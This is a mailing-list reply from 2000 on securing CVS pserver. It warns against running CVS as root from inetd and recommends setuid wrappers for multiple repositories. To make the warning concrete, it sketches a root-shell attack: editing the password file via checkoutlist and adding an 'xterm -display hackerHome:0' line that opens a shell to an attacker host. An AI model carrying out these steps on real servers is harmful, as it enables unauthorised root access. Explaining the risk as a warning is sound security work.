[Top][All Lists]

[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

Re: PServer authentication

From: Martin Vogt
Subject: Re: PServer authentication
Date: Fri, 13 Oct 2000 17:03:06 +0200
User-agent: Mutt/1.2.5i

On Fri, Oct 13, 2000 at 10:42:17AM -0400, Larry Jones wrote:
> Mike Castle writes:
> > 
> > I was always under the impression the those using OpenBSD were doing so for
> > security reasons.  And pserver is far from secure!
> As long as all the users have shell accounts on the server, a typical
> pserver installation won't allow them to do anything they couldn't do
> from the shell account.  pserver is only a security problem when you
> want to allow access to untrusted users.
And as long as you dont run cvs as "root" from inetd.
This is _very_ important, otherwise add passwd to the checkoutlist
(when you have write access) add root:apasswd:root and add
an xterm -display hackerHome:0 to the commitlog, voila: root shell.

If you want multiple repositories on one server use setuid wrappers.


reply via email to

[Prev in Thread] Current Thread [Next in Thread]